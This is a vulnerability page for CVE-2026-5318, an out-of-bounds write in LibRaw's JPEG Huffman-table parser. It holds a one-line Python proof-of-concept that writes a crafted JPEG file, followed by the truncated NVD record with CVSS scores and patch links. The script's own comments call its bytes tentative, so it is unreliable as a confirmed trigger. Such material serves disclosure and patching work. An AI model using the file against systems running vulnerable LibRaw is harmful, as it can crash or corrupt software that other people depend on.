CVE-2026-5318

import struct def generate_malformed_jpeg(filename): # JPEG Start of Image data = b'\xff\xd8' # DHT Marker (Define Huffman Table) - 0xFFC4 # This PoC attempts to trigger the OOB write in HuffTable::initval # by crafting a specific DHT structure. dht_marker = b'\xff\xc4' # Length of the DHT field (example length) length = 0x0015 payload = struct.pack('>H', length) # Crafted bits[] data to potentially trigger the vulnerability # This simulates the manipulation of the argument mentioned in the CVE payload += b'\x00\x01\x02\x03\x04\x05' payload += b'\xFF' * (length - 2 - 6) data += dht_marker + payload # End of Image data += b'\xff\xd9' with open(filename, 'wb') as f: f.write(data) print(f"Malformed JPEG generated: {filename}") if __name__ == "__main__": generate_malformed_jpeg("cve_2026_5318_poc.jpg")

{"cve": {"id": "CVE-2026-5318", "sourceIdentifier": "[email protected]", "published": "2026-04-02T03:16:07.080", "lastModified": "2026-04-29T21:53:04.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in LibRaw up to 0.22.0. This impacts the function HuffTable::initval of the file src/decompressors/losslessjpeg.cpp of the component JPEG DHT Parser. This manipulation of the argument bits[] causes out-of-bounds write. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 0.22.1 will fix this issue. Patch name: a6734e867b19d75367c05f872ac26322464e3995. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.22.1", "matchCriteriaId": "E48D9289-6F64-4DBB-98D7-EB902084B2B9"}]}]}], "references": [{"url": "https://github.com/LibRaw/LibRaw/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/LibRaw/LibRaw/commit/a6734e867b19d75367c05f872ac26322464e3995", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LibRaw/LibRaw/issues/794", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/LibRaw/LibRaw/issues/794#issuecomment-4065342499", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/LibRaw/LibRaw/releases/tag/0.22.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/biniamf/pocs/tree/main/libraw_lljpeg", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]} ... (truncated)